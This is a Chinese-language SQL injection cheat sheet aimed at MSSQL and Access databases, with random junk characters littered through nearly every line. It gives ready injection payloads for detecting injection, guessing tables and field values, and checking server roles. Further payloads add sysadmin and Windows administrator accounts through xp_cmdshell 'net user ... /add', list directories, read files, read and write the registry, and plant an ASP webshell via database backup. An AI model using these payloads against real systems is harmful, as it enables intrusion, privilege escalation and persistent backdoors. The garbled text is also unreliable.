1.判断是否有注入;and 1=1 ;and 1=2 . E?a
2.初步判断是否是mssql ;and user>0 /{FSG!
~xU\%@I\
3.注入参数是字符'and [查询条件] and ''=' m`6=6(_p
3"p'WZ>
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ]=?.LMjnH
^Q5advxuq
5.判断数据库系统 `i{p6-U3
!X ={a{<,T
;and (select count(*) from sysobjects)>0 mssql S9lT4
NZ:KJ8ea"
;and (select count(*) from msysobjects)>0 access iNv"!'|
*TC#|5
h$$2(!G4
H rI(uZ]
6.猜数据库 ;and (select Count(*) from [数据库名])>0 lCiRvh1K
5"2pU{xmK
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 '-M9v3itC
&"mWi-Mpl
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ~R
C\
)bl^:C
9.(1)猜字段的ascii值(access) <(W:Q3?s
xY<*:&
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
O2N~&<^
cs0rz= ZdH
(2)猜字段的ascii值(mssql) \<Di|X1
p%ZAVd*|#V
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 N.dcQQ_iS
RLR\*dL1
10.测试权限结构(mssql) !T
RU
y[d>7fcf
KkyZd9
$_Q]3"U
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- a|kEza,]
uQO\vRh0
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- }Wz[ox 9b
"`Y.5.
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Y?xc#'
UIK4]cYC'
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- iPdR;O'
"V{v*Aei0
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Bnh*;J0
RKD$'UWX
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- m t}3/d
d~z%kl
5:
;and 1=(select IS_MEMBER('db_owner'));-- kadw1sYj
%z"n}|%!
-I.BQ
21 N!?DR
11.添加mssql和系统的帐户
\JBPZ~N3
~%QI#s?|
;exec master.dbo.sp_addlogin username;-- OTD<3Q
q
;exec master.dbo.sp_password null,username,password;-- #y*p7~|@
5m9;'SF
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 3h**y
%^
KhZ\q|5
;exec master.dbo.xp_cmdshell 'net user username password YWhp 4`m
2}U:6w
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- UX@8
FC#t}4as
;exec master.dbo.xp_cmdshell 'net user username password /add';-- sPRo=LB
:aWC6"ik-W
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- xew s~74L
i9v|*ZM"
_l=X?/
Uu~~-5
12.(1)遍历目录 A O3MlK9t
36\_Y?zx%
;create table dirs(paths varchar(100), id int) } T&~DVM
MTAq}8
;insert dirs exec master.dbo.xp_dirtree 'c:\' DTz)qHd#X
8]&\FA 8
;and (select top 1 paths from dirs)>0 _ pO1XM
Hgbrlh
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 9@wmngvM*Y
]:svR@E
O7z5,-
{9XQ~t"m^
(2)遍历目录 H&uh$y@
s7s@!~
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- lX/:e=
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 wG
X\ub#!
Bj*
M
W
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 |Fe*t
Huf;A1.
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 mO&zE;/[
n7pjj
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 C~R,,
cHX~-:KOr
HleMzykF
ca,U>'(y
13.mssql中的存储过程 S3gd'Bahq
1;JH0~403
xp_regenumvalues 注册表根键, 子键 jS4fANG
J=Hyoz+9
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 t(Gg
1
n..R'vNj
xp_regread 根键,子键,键值名 !'*1;OQ
{!xDJnF;
;exec xp_regread `gz/?q
<`d;>r=4z
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ?JMy
f[-$##S.~
xp_regwrite 根键,子键, 值名, 值类型, 值 2q ~y\fe
Zqj EVVB
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 /7igPNhx
.svlJSx
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 [U_
>r.W \
xp_regdeletevalue 根键,子键,值名 VF:95F;@
0X4I-xx#
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 \-CL}Z}S
h
I7ur
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ?xw0kXK4
v)<|@TD)
tf6 Zz[
y=LN|vkQ
14.mssql的backup创建webshell B~2M/&rM\
'Xu3]'m*
use model j.+}Z |
S^A+Km3VB
create table cmd(str image); 0ni/!}YP_
p{[(4}ql
insert into cmd(str) values (''); -YY@[5x?u
j> dL:V&`
backup database model to disk='c:\l.asp'; 0X}0,
sF~!qag4q'
qv3% v3\4
#7=- zda5
15.mssql内置函数 gbziEjRe
> *soc!# Y
;and (select @@version)>0 获得Windows的版本号 [Nu py,v
nJY3 1(p
;and user_name()='dbo' 判断当前系统的连接用户是不是sa |f2bb
a([8r- zP
;and (select user_name())>0 爆当前系统的连接用户 U\i7'9w]3
?<1~KLPMhY
;and (select db_name())>0 得到当前连接的数据库 lH/7m;M
|jb,sd[=S
[" sm7yQ
CvRO'
16.简洁的webshell Q-Oj%w4e
[wn!
<#~v
use model hkx (r5o
a V#phP
create table cmd(str image); Q:8t1ZDo
<KFl4A~
insert into cmd(str) values (''); 2*a5pFkb
,PeE'$q
backup database model to disk='g:\wwwtest\l.asp';